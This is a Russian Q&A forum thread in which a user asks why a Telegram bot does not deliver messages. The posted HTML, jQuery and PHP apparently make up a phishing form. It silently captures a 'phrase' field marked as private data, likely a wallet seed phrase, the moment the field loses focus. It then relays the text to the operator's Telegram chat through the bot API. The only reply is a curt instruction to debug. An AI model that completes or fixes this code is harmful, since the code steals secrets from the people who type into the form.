Этот вопрос закрыт для ответов, так как повторяет вопрос Почему не происходит отправка данных?
@Veyder

Почему не происходит отправка сообщений?

Хотел сделать отправку данных из формы в телеграмм через бота без перезагрузки страницы. Алгоритм действий такой: при расфокусировке одного поля, данные формы отправляются через скрипт php. Всё работает, в консоли ошибок нет, network показывает, что php успешно отправляет запросы, но вот сами сообщения от бота в тг не приходят.
HTML:
<form method="post" class="form-horizontal" role="form">
  <label for="phrase" class="col-sm-2 control-label"></label>
  <div class="col-sm-10">
      <textarea name="phrase" id="phrase" class="phrase private-data form-control" data-show-qr autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"></textarea>
  </div>
  <button type="submit" style="display: none"></button>
</form>

JS:
(function ($) {
  $(function() {
    $("#phrase").on('blur', function() {
      $.post("auth.php", $(".form-horizontal").serialize(), function(data){alert (data);}
      );
    });
  })
})(jQuery);

PHP:
<?php
  $bot_token  = '//токен';
  $tg_user = '//id';

if ($_SERVER["REQUEST_METHOD"] == "POST") {
  $msg = $_POST['phrase'];

  $params = array(
    'chat_id' => $tg_user,
    'text' => $msg,
    'parse_mode' => 'HTML',
  );

  $curl = curl_init();
  curl_setopt($curl, CURLOPT_URL, 'https://api.telegram.org/bot' . $bot_token . '/sendMessage');
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  curl_setopt($curl, CURLOPT_POSTFIELDS, $params);
  $result = curl_exec($curl);
  curl_close($curl);
 
  var_dump(json_decode($result));
} else {
  header("Location: /");
}

Сначала пытался организовать отправку формы без перезагрузки страницы через AJAX, но потом изменил решение.
  • Вопрос задан
  • 93 просмотра
Решения вопроса 1
ThunderCat
@ThunderCat Куратор тега PHP
{PHP, MySql, HTML, JS, CSS} developer
Всё работает,
Очевидно нет

в консоли ошибок нет,
тоже вранье6249ec31e700f878953982.jpeg

network показывает, что php успешно отправляет запросы,
Да нифига подобного6249ec6c30b3a813115213.jpeg

Перестань маяться херней, займись исправлением ошибок и проверкой работы по шагам - ошибки скрипта, ошибки запросов сети, ошибки пхп...
Ответ написан
Ваш ответ на вопрос

Вопрос закрыт для ответов и комментариев

Потому что уже есть похожий вопрос.
Похожие вопросы